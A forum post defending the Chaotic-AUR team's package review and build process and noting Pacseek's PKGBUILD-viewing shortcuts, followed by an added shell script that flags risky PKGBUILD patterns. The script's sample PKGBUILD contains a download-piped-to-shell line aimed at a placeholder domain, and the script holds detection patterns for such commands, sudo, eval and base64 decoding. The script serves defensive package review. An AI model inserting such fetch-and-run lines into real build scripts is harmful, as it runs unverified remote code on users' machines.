Pamac/Octopi/Pacseek Alternatives- To AUR or Not to AUR?

I feel compelled to defend the Chaotic-AUR team because I know those guys break their backs to keep that repo in good shape. It is driven by automation as you say, but there is quite a bit of time and manual effort that goes into maintaining it as well.

Users can request packages be added to the repo on the GitHub issue page (https://github.com/chaotic-aur/packages/issues), but they are not just blindly added. One of the team members looks over the PKGBUILD and determines if the package should be added or not. Often a good deal of consideration and back-and-forth discussion is involved; open up some of the issues on the page and you will see what I mean.

After a package is approved to be added to the repo, sometimes even more work is required. Here is the interferes repo:

Inside each directory is a modification which will be applied to the PKGBUILD before the build process begins. Being able to deviate from the AUR version of the PKGBUILD allows them to fix broken packages, apply changes that benefit the build routine, or add optimizations for the package itself.

The entire build process is completely transparent, and the website is actually pretty interesting to look through. For example, here is the build status page:

You can examine the pipeline, see what packages are being updated, or inspect the logs for a failed build if you want to. A lot of it goes over my head to be honest, but it’s still pretty neat I think.

Is it possible to sneak a malicious package into the Chaotic-AUR? Yes, absolutely it is. There are tons of packages in there, and a comparatively small team to look after everything. There is no way they can vouch for every package in the repo.

But if anything, it’s harder to get a malicious package into the Chaotic-AUR than the regular AUR because there is the additional barrier of the team checking over packages during the approval process, and while performing maintenance tasks. That is not to say people should use it or blindly trust the packages in it, but rather to say it is unlikely to be more risky than installing the same package from the AUR itself.

At the end of the day, as with the regular AUR, it is ultimately up to the user to review the package and inspect the PKGBUILD to decide if they would like to install a package or not.


Speaking of Pacseek and reviewing PKGBUILDs, you can review the PKGBUILD for any package from within Pacseek itself by pressing Ctrl+P.

You can also press Ctrl+O to visit whatever URL is listed for the package. A very handy tool for reviewing packages! 😎

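The post above ends on the point that the user still has to read the PKGBUILD. As an added example (not code from the original thread or from the Chaotic-AUR project), here is a small POSIX sh triage script that flags the things worth reading first in a PKGBUILD: plain-http sources, `SKIP` checksums, download-piped-to-shell, and `sudo`/`eval`/`base64 -d` in build steps. The PKGBUILD it runs on is a constructed sample with an `example.invalid` domain, not a real AUR package.

```shell
#!/bin/sh
# Added example: PKGBUILD triage helper. Assumes only POSIX sh, grep, sed, wc, mktemp.
# The sample PKGBUILD is constructed for this demo and does not describe a real package.

write_sample_pkgbuild() {
    cat > "$1" <<'EOF'
# Maintainer: constructed sample, not a real AUR package
pkgname=example-tool
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/$pkgname-$pkgver.tar.gz"
        "helper.sh::http://example.invalid/helper.sh")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000'
            'SKIP')
build() {
  cd "$pkgname-$pkgver"
  make
  curl -fsSL https://example.invalid/setup.sh | sh
}
package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
EOF
}

# Print one "<category>: <line>:<text>" finding per matching line of the PKGBUILD.
pkgbuild_findings() {
    f="$1"
    # Sources fetched without TLS can be swapped in transit; the checksum is the only defence.
    grep -nE "http://" "$f" | sed 's/^/plain-http: /'
    # SKIP turns off integrity checking for that source (normal for VCS sources, read it anyway).
    grep -nE "sums=.*SKIP|^[[:space:]]*'SKIP'" "$f" | sed 's/^/skip-checksum: /'
    # A download piped straight into a shell executes whatever the server returns today.
    grep -nE "(curl|wget)[^|]*\|[[:space:]]*(ba)?sh" "$f" | sed 's/^/pipe-to-shell: /'
    # Privilege escalation or decoded blobs have no business inside build()/package().
    grep -nE "(^|[^[:alnum:]_])(sudo|eval)([^[:alnum:]_]|$)|base64[[:space:]]+(-d|--decode)" "$f" \
        | sed 's/^/suspicious-cmd: /'
    return 0
}

# Number of findings, handy as a quick "does this need a careful read" signal.
pkgbuild_finding_count() {
    pkgbuild_findings "$1" | wc -l | tr -d ' '
}

demo_file=$(mktemp)
write_sample_pkgbuild "$demo_file"
pkgbuild_findings "$demo_file"   # sample yields plain-http, skip-checksum and pipe-to-shell hits
rm -f "$demo_file"
```

A hit is a prompt to read that part of the file closely, not a verdict; point the functions at `~/.cache/` build directories or a downloaded PKGBUILD before running makepkg.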